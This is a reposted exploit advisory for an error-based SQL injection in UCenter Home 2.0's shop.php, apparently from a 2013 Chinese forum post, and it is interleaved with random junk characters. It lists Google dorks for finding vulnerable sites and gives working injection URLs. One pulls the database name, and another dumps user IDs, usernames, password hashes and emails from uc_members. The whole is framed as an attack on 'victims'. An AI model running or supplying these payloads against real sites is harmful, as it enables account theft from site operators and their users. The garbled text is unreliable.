: d2 I8 W' a, H' K__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
+ p4 l! D9 n$ }; V' y( A: P0 C* q! y4 f( w
+ P0 {, v2 Z0 T6 u# u7 k/ h3 ?/ X0 X8 z1 N2 M- q& k, n0 T
*/ Author : KnocKout
0 d! W5 z) a6 ?: \% p* T. `3 m# t% Y
) ]; r* G/ ^6 g/ A/ K$ Q*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
$ B) X; T' a+ x2 @8 |% o5 m5 \8 H: ^9 F! m: {
*/ Contact: knockoutr@msn.com
0 y1 ]8 r; Q) |( Z3 Y! \6 i# d
H* Z3 O( K' D2 I0 {0 ?; T- v*/ Cyber-Warrior.org/CWKnocKout ( m' q1 x! M, y6 i+ @0 w* ]
# B+ ?/ b3 `/ @/ K__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( E- t1 Z, D3 C! j3 R
+ R; U4 u+ x# C$ n. S6 EScript : UCenter Home ! G9 Q9 t; x- G" Y" V
- H1 }" @+ z; r; \ m' L: j
Version : 2.0
9 W; s0 \& s; i8 u9 K6 r9 C2 g1 Q0 v. C% _, A2 u, I
Script HomePage : http://u.discuz.net/ $ F5 k0 j% T) r
3 G. k5 L5 u3 R1 J8 }0 t, l* c8 p
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % v0 `$ Q* ?. j# B# ]& E+ l- j
8 z8 D, G' K; E3 U ~
Dork : Powered by UCenter inurl:shop.php?ac=view
! j1 ?7 g! X' q# P6 c8 v$ J( n( a2 }3 i
Dork 2 : inurl:shop.php?ac=view&shopid= 1 O$ U& H. G# F) z H3 Z, ?
1 |) i9 B$ W; n' w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + \4 p# e3 u6 i
5 K6 E+ m8 j+ ]0 @Vuln file : Shop.php
& k/ a7 M# D6 u' X' C; @+ u- i7 }# }1 z( X
value's : (?)ac=view&shopid=
. C- @+ M6 E8 Y% s- x1 G- t- q$ o' F" y* l6 j0 H2 W4 k$ C! [. i
Vulnerable Style : SQL Injection (MySQL Error Based)
/ z" o. U- g# \8 V' |( @. x9 ]# Z1 n5 n
Need Metarials : Hex Conversion
* `. d8 o7 F* J* B' D5 c% C
, Z& N$ g9 g/ w; W0 b5 L__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( S- U+ Z" t6 t( K1 _% P. ^
+ e% \+ Q, D& W5 TYour Need victim Database name.
- a) n1 C9 s2 A
- G# |* V8 w3 e# i( ?for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
7 w0 n! b; W0 R4 @6 Y" i
! i* N: l* U6 v6 b.. ) R7 P" _$ N- f, L2 H4 W7 w
* Y* l6 U9 \" i3 e a7 iDB : Okey. 7 o. K+ [1 d3 n: g3 e
0 ^2 u2 b7 [3 {9 v H; i$ u
your edit DB `[TARGET DB NAME]`
. @* y. e2 {; G+ q
4 q2 K5 i/ c) qExample : 'hiwir1_ucenter' ' |8 n, T8 l9 W$ m. ?" Y0 k
# b: N% s# x0 G! c8 Q3 s- r, c; ^+ dEdit : Okey. # e# x2 U1 m8 A
" d" k' h# g! @, T2 Y4 G) jYour use Hex conversion. And edit Your SQL Injection Exploit.. 3 G1 @( d# N8 x& A/ i
" y' A* d. P& a% U/ T% l
- t; X" A ]# @" z9 Q& g2 `9 J* d. G% i' |$ U# `; N
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
% R8 b! j% Z. G, E* e5 X; D3 w1 Q |
发表于 2013-2-27 21:31:31
收藏
支持
反对